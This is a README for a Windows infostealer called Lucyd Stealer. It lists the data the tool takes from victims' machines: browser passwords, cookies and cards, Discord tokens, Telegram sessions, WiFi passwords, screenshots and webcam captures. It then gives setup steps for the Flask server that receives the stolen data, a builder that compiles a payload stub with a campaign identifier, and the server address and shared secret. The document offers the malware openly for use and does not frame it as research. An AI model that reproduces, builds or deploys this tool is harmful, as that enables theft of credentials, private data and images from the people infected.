Lucyd Stealer

Windows data extraction tool written in C# (.NET 8).

Capabilities

• Browsers: Decrypts and extracts passwords, cookies (Netscape format), history, and autofill/cards from Chrome, Edge, Opera, Yandex, Brave, Vivaldi. Uses direct SQLite access and AES-GCM decryption.
• Discord: Extracts authentication tokens.
• Telegram: Extracts tdata/session files.
• Network: Dumps saved WiFi passwords.
• System: Collects hardware info, OS version, installed processes.
• Multimedia: Captures screenshots of all monitors and webcam images.
• Files: Grabs specified file types from Desktop (configurable size limits).

Requirements

• Server: Python 3.10+
• Client: .NET SDK 8.0 (for building)

Setup Guide

1. Backend (Server)

Receives logs and archives from the client.

1. Navigate to backend/.

2. Install dependencies:

   pip install -r requirements.txt

3. Start the server:

   python run.py

   Server runs on http://127.0.0.1:5000 by default.

   Configuration: Edit .env or defaults in backend/app/config.py to change the SHARED_SECRET if needed.

2. Builder & Compilation

The Builder (Lucyd.exe) configures and compiles the client stub.

1. Open Lucyd.sln in Visual Studio.
2. Build and run the Lucyd project (MainForm).
3. Configuration:
   • Base URL: Address of your Python server (e.g., http://127.0.0.1:5000 or public IP).
   • Shared Secret: Must match the secret in the backend configuration.
   • Client Version: Identifier for the campaign/version.
4. Modules: Check the features you want to enable (Browsers, WiFi, etc.).
5. Click Build.
6. The output Stub.exe will be generated in a temporary directory.

Project Structure

• client/: Source code for the payload (Stub).
• backend/: Python Flask server for receiving data.
• Lucyd/: Builder GUI application (WinForms).